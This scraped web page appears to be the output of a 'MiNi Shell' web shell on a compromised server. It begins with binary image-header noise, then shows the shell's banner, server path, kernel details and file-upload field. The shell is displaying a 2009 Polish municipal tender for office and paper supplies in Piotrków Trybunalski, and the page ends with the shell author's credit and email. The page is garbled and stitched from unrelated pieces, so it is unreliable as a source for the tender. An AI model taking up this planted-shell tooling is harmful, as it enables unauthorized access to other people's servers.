JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090113/13531-N-2009.html

<p class="kh_header"><b>Piotrków Trybunalski: Sukcesywna dostawa materiałów papierniczych, pismienno - biurowych i geodezyjnych w 2009 r. dla potrzeb Urzędu Miasta Piotrkowa Trybunalskiego</b><br>
<b>Numer ogłoszenia: 13531 - 2009; data zamieszczenia: 13.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Piotrków Trybunalski , ul. Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7327796, faks 044 7327798.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piotrkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa materiałów papierniczych, pismienno - biurowych i geodezyjnych w 2009 r. dla potrzeb Urzędu Miasta Piotrkowa Trybunalskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Segregator A4 80mm  z twardej tektury z usztywnioną dolną krawędzią metalowym okuciem z kolorowym grzbietem i wymienną etykietą szt. 1.000
Segregator A4 50mm z twardej tektury z usztywnioną dolną krawędzią metalowym okuciem z kolorowym grzbietem i wymienną etykietą szt. 500
Koperta biała samoprzylepna C6 114 x 162 mm szt. 100.000
Koperta biała samoprzylepna C6 114 x 162 mm z oknem prawym szt. 15.000
Koperta biała samoprzylepna C5  162 x 229 mm	szt. 20.000
Koperta biała samoklejąca C4, 229 x 324 mm szt. 10.000
Koperta brązowa samoklejąca B4, 250 x 353 x 40 mm z rozszerzanym bokiem	szt. 2.000
Teczka wiązana biała z kartonu min. 275g m2 z nadrukiem na przedniej stronie  szt. 10.000
Skoroszyt z zawieszką biały z kartonu min.275g m2 z nadrukiem na przedniej stronie szt. 3.000
Skoroszyt oczkowy biały   z kartonu min. 275g m2 z nadrukiem na przedniej stronie szt. 2.700
Skoroszyt A4 z PCV sztywny, zawieszany do segregatora  z przednią okładką przezroczystą, tylną w różnych kolorach ( kolor do wyboru) szt. 2.700
Koszulki na dokumentyA4 foliowe, przezroczyste, otwierane u góry, pasujące do każdego segregatora szt. 10.000
Teczka do podpisu A4 z 10 przegrodami z rozszerzonym grzbietem, oklejana tapetą introligatorską (kolor do wyboru) szt. 10
Blok szkolny A4 50 kartek, krata szt. 100
Blok szkolny A5 100 kartek, krata szt. 100
Brulion A4 szyty, oprawa twarda 96 kart, krata, oklejane kolorową tapetą szt.200
Zeszyt 32 kart. krata szt. 30
Zeszyt 60 kart. w twardej oprawie, krata szt. 50
Zeszyt 96 kart. w twardej oprawie, krata- oklejany kolorową tapetą szt. 180
Książka kancelaryjna szyta, twarda oprawa oklejana tapetą introligatorską 100 kart. szt.	50
Bloczki samoprzylepne, ok.75 x 75mm, ok. 100 kart szt. 100
Bloczki samoprzylepne, ok.38 x 50mm, ok. 100 kart szt. 45
Rolka faksowa 210mm x 30m	szt. 70
Rolka kasowa offsetowa 57mm x 30m	szt. 250
Bloczki samoprzylepne, ok.152 x 75 mm, ok. 100 kart  szt. 30
Korektor w pisaku szybkoschnący z końcówką metalową, poj.7ml. szt. 100
Korektor w taśmie do korekcji tekstu drukowanego szer.4,2-5mm, dł. 8-9m. szt.90
Dziurkacz biurowy średni dziurkujący minimum 25 kartek, metalowy lub metalowo-plastikowy z wysuwanym ogranicznikiem formatu szt.  45
Nożyczki 20-25 cm długości ze stali nierdzewnej ergonomiczna rączka z odpornego na pęknięcia tworzywa,(czarna) szt. 40
Zszywacz biurowy zszywający minimum 25 kartek na zszywki 24.6, głębokość wsunięcia kartek 55-65mm	szt. 50
Zszywki rozm.24.6 (1000 szt.opak) opak. 1.000
Rozszywacz nożycowy do zszywek  24/6 szt. 45
Spinacz owalny metalowy 28mm (100 szt.opak.) opak. 700
Spinacz owalny metalowy 50mm (100 szt. opak.) opak. 450
Klej w sztyfcie nietoksyczny, bezbarwny, bezzapachowy,  17-22g	szt. 200
Klej biurowy w tubie , biały nietoksyczny, 50ml.	szt. 70
Taśma klejąca biurowa przezroczysta, 18mm x 20m rolki 200
Taśma pakowa brąz. jednostronnie klejąca, 48mm x ok.50m. rolki 80
Poduszka do stempli 7 x 11 cm w wersji nienasączonej tuszem, metalowa szt.20
Tusz do stempli, 25-28ml. (kolor: czarny, czerwony) szt.	100
Długopis na łańcuszku metalowym z wymiennym wkładem, podstawką przyklejaną do podłoża, długość łańcuszka ok. 1 m. szt. 90
Wkład do długopisu jw. (czarne, nieb) 	szt. 45
Koperta podłużna biała samoprzylepna DL 110 x 220 mm	szt. 5.000
Teczka na gumkę wzdłuż długiego boku, biała z kartonu min.350g m2 z nadrukiem na przedniej stronie szt. 250

Papier ksero, A-4 biały, typu POLLUX do kserokopiarek, drukarek atramentowych, laserowych o gramaturze (80g m2 ) ryza 3.500
Papier ksero, A-3 biały, typu POLLUX do kserokopiarek, drukarek atramentowych, laserowych o gramaturze (80g m2 ) ryza 60
Papier komputerowy, biały bez nadruku 240 x 2  x 12 paczki 60
Papier komputerowy, biały bez nadruku 240 x 4 x 12 paczki 10

PAPIER STANDARD 90g DO OCE TCS - 500     		
Rolka 297 mm x 110 m  rolka	20
Rolka 420 mm x 110 m rolka	20
Rolka 594 mm x 110 m rolka	20
Rolka 841 mm x 110 m rolka	20
Rolka 914 mm x 110 m rolka	20
PAPIER POWLEKANY 90 g  DO OCE  TCS- 500 		
Rolka 610 mm  x 45 m rolka	4
Rolka 914 mm x 45 m rolka 4
FOLIA MATOWA (GRUBA) dwustronna matowa - 95 mic		
Rolka 610 mm x 45 m szt. 2
Rolka 841mm x 45 m szt. 2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 22.85.00.00-3, 30.19.20.00-1, 30.19.76.44-2.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Do udziału w licytacji elektronicznej zostaną dopuszczeni wykonawcy spełniający warunki, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych [Dz. U. z 2007r. Nr 223, poz. 1655 z późn. zm.] tj.:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępniania potencjału technicznego i osób zdolnych do wykonania zamówienia;
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełniania tych warunków będzie polegała na ocenie spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (oryginał lub kserokopię potwierdzoną za zgodność z oryginałem przez upełnomocnionego przedstawiciela wykonawcy, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania wniosków. 
Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub KRUS potwierdzających odpowiednio, że wykonawca nie zalega 
z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczeniu do udziału w postępowaniu o udzielenie zamówienia lub składania ofert .
Wykaz wykonanych min. 3  zamówień w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, tj.:3 usługi dotyczące dostawy materiałów papierniczych, piśmienno - biurowych i geodezyjnych o wartości nie mniejszej niż 50.0000 zł brutto  - wg załącznika nr 2. 
Referencje potwierdzające należyte wykonanie prac wskazanych w załączniku nr 2. 
Oświadczenie z art. 22 ust. 1 [Dz. U. z 2007r. Nr 223, poz. 1655], stosownie do treści art. 44, podpisane przez upełnomocnionego przedstawiciela wykonawcy - załącznik nr 1.
W przypadku podmiotów występujących wspólnie - umowę regulującą współpracę tych podmiotów. 
Pełnomocnictwo do reprezentowania wykonawcy - jeśli nie wynika to z zapisów 
w odpisie z rejestru lub zaświadczeniu o wpisie do ewidencji działalności gospodarczej.
Wypełniony i przesłany pisemnie lub faksem i elektronicznie Formularz Wykonawcy - załącznik 3 do ogłoszenia (Urząd Miasta Piotrkowa Trybunalskiego, Referat Zamówień Publicznych, pok. 317, Pasaż Rudowskiego 10, 97-300 Piotrków Trybunalski, fax. 44 732 77 98, e-mail: i.smolarczyk@piotrkow.pl).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> www.pwpw.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.piotrkow.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wymagania techniczne urządzeń informatycznych:
komputer klasy PC;
system operacyjny Windows 2000 lub wyższy;
zegar 300Mhz, 64MB RAM; 
stałe łącze internetowe; 
przeglądarka Internet Explorer 5.5 bądź wyższa;
aplet java pobrany jednorazowo przy pierwszym połączeniu ze stroną;
wyłączona autoryzacja na serwerze proxy;

Po dopuszczeniu przez Zamawiającego do udziału w licytacji elektronicznej Wykonawcy zostaną zaproszeni do składania ofert, a ich dane zostaną przesłane do PWPW S.A. Wykonawcy dopuszczeni do udziału w licytacji elektronicznej otrzymają od PWPW S.A. drogą elektroniczną bezpłatne instrukcje obsługi systemu aukcyjnego oraz login i hasło dostępu do systemu aukcyjnego. 

Istnieje możliwość udziału w odpłatnym szkoleniu dla Wykonawców dotyczącym obsługi systemu aukcyjnego - informacje pod numerem telefonu: (22) 531 27 64. 
PWPW S.A. udziela informacji technicznych związanych z organizacją licytacji elektronicznej pod numerem tel. (22) 530 27 96, e-mail: aukcje@pwpw.pl.</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> Cena wywoławcza: 70.000,00 zł (brutto). 

Minimalny krok postąpienia: 200,00 zł (brutto).

W czasie trwania licytacji wykonawcy, którzy otrzymali loginy i hasła dostępowe do systemu aukcyjnego, składają za pośrednictwem Internetu swoje oferty cenowe za pomocą formularza umieszczonego na stronie internetowej - www.ppp.pwpw.pl.

Ofertę składa się, pod rygorem nieważności, w postaci elektronicznej.
Oferty składane przez wykonawców podlegają automatycznej klasyfikacji na podstawie ceny.
Oferta złożona w toku licytacji przestaje wiązać, gdy inny wykonawca złożył ofertę korzystniejszą..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">30 min.</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 21.01.2009 godzina 10:00, miejsce: Urząd Miasta Piotrkowa Trybunalskiego, Referat Zamówień Publicznych, pok. 317, Pasaz Rudowskiego 10, 97-300 Piotrków Trybunalski..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 29.01.2009 r..</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> Zamknięcie licytacji nastapi w chwili upływu czasu podstawowego trwania licytacji elektronicznej..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> Maksymalny czas trwania licytacji: 55 minut.
Licytacja kończy się wraz z upływem:
30 minuty - jeżeli w okresie miedzy 27 a 30 minutą nie zostanie złożona nowa oferta,
35 minuty - jeżeli w okresie miedzy 27 a 30 minutą zostanie złożona nowa oferta,
35 minuty - jeżeli w okresie między 32 a 35 minutą nie zostanie złożona nowa oferta,
40 minuty - jeżeli w okresie miedzy 32 a 35 minutą zostanie złożona nowa oferta,
40 minuty - jeżeli w okresie miedzy 37 a 40 minutą nie zostanie złożona nowa oferta,
45 minuty - jeżeli w okresie między 37 a 40 minutą zostanie złożona nowa oferta, 
45 minuty - jeżeli w okresie między 42 a 45 minutą nie zostanie złożona nowa oferta,
50 minuty - jeżeli w okresie między 42 a 45 minutą zostanie złożona nowa oferta,
50 minuty - jeżeli w okresie między 47 a 50 minutą nie zostanie złożona nowa oferta,
55 minuty - jeżeli w okresie miedzy 47 a 50 minutą zostanie złożona nowa oferta,
55 minuty - jeżeli w okresie miedzy 52 a 55 minutą zostanie, bądź nie zostanie złożona nowa oferta..</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com